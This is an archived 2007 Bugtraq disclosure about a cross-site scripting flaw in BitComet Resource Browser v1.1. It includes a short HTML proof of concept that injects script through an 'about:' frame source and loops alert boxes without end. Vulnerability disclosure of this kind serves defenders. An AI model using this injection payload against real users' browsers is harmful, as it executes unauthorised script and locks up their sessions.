lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071124043340.20731.qmail@securityfocus.com> Date: 24 Nov 2007 04:33:40 -0000 From: jplopezy@...il.com To: bugtraq@...urityfocus.com Subject: Bitcomet Resource Browser v1.1 XSS The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity. Create an html file and paste the following code <html> <frameset rows="100%"> <frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>"> </frameset> </html>